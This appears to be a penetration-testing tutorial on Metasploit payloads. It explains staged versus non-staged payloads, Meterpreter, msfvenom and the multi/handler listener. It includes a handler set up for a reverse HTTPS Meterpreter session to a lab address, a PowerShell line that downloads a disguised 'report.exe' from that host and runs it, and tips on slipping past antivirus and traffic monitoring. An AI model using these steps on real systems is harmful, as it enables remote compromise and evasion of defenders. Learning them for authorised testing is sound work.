The Payload Is Its Own Decision
The exploit only gets you through the door.
What you actually hold once inside is the payload. A weak choice hands you a flaky, cramped shell. A good one hands you file transfer, encryption, and a foothold that survives.
So the payload deserves real thought, not a default.
Staged vs Non-Staged
Every Metasploit payload ships in one of two shapes. This trips people up, so watch it carefully.
Non-staged is all-in-one. The complete payload travels in a single piece.
- Bigger on the wire
- Simple and stable
- Nothing to fetch afterward
Staged splits in two. A tiny stager goes first, phones home, and pulls the real stage down into memory.
- Tiny first hop
- Fits tight spaces where a full payload wouldn’t
- The stage loads in memory, which can slip past defenders watching for a whole payload
There’s a naming tell that saves you every time:
| Name | Shape |
|---|---|
shell_reverse_tcp | non-staged (underscore) |
shell/reverse_tcp | staged (slash) |
Underscore is one piece; slash is split. When an exploit has almost no room for shellcode, reach for the staged version.
Meterpreter
The payload you’ll want most is Meterpreter.
It’s not a plain shell. It’s a multi-function payload that:
- lives entirely in memory (nothing written to disk)
- encrypts all its traffic
- carries built-in commands for files, processes, pivoting, and privilege work
A few of its everyday commands:
meterpreter > sysinfo # OS, architecture, hostname
meterpreter > getuid # who you are running as
meterpreter > download secret.txt
meterpreter > upload tool.exe
meterpreter > shell # drop to a normal shell when you want one One variant is worth knowing by name: meterpreter_reverse_https.
Its traffic looks like ordinary HTTPS, and it’s encrypted, so a defender watching the wire sees routine web traffic, not a shell.
Meterpreter is Metasploit’s crown jewel, and its most-signatured code. Antivirus knows it well. The usual play: get a plain shell first, and only bring in Meterpreter once you’ve handled the defenses.
msfvenom: Payloads as Files
Sometimes you don’t have an exploit module, you just need the payload as a file: a Windows .exe, a Linux binary, a web shell.
That’s msfvenom. List what’s available:
Then build one. Set the payload with -p, your address with LHOST/LPORT, the file format with -f, and the output name with -o:
Drop it on the target, run it, and catch the shell.
Catching What You Sent
Here’s the catch that bites everyone.
- A non-staged raw shell (the underscore kind) can be caught with plain Netcat.
- A staged payload, or any Meterpreter, cannot. Netcat has no idea how to send the second stage.
For those, you need Metasploit’s own listener: multi/handler.
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_https
msf6 exploit(multi/handler) > set LHOST 10.10.14.5
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > run -j The handler’s payload must match the file exactly. Build with
meterpreter_reverse_https, catch withmeterpreter_reverse_https. Mismatch and the connection dies on arrival.
So the full flow for a Meterpreter binary is: build with msfvenom, start multi/handler, run the file, catch the session.
Then on the target, pull it down and run it:
PS> iwr -uri http://10.10.14.5/report.exe -Outfile report.exe
PS> .\report.exe Your multi/handler lights up with a fresh Meterpreter session.